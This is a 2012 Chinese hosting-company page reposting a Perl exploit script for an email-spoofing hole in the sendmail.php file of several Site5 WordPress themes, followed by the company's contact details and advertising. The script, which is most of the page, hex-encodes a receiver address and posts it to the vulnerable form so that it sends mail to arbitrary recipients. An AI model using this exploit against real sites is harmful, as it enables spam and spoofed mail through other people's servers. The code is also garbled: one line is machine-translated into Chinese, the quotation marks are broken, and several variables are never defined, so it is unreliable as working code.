Site5 WordPress電子郵件欺騙漏洞 |
發(fā)布時間: 2012/7/28 18:44:00 |
以下是利用本地搭建的site5 wordpress 漏洞文件:
diary, simploblack, simplo, journalcrunch, boldy, webfolio
my $theme = ‘diary’;
my $url = $wordpress.’wp-content/themes/’.$theme.’/sendmail.php’;
我的電子郵件=“test.five@yahoo.cn;
#Receiver email address
my $receiver = ‘test.five@yahoo.cn’;
$receiver =~ s/(.)/sprintf(“%x”,ord($1))/eg;
my $ua = LWP::UserAgent->new();
my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => 'submit', ] );
print “Sending request to $url\n”;
my $content = $ua->request($request)->as_string();
print $content;
print “\nDone\nFollow \@BallastSec on Twitter\n”;
億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡 QQ:89317007 電話:0371-63322206 本文出自:億恩科技【mszdt.com】 本文出自:億恩科技【www.enidc.com】 --> 服務(wù)器租用/服務(wù)器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM] |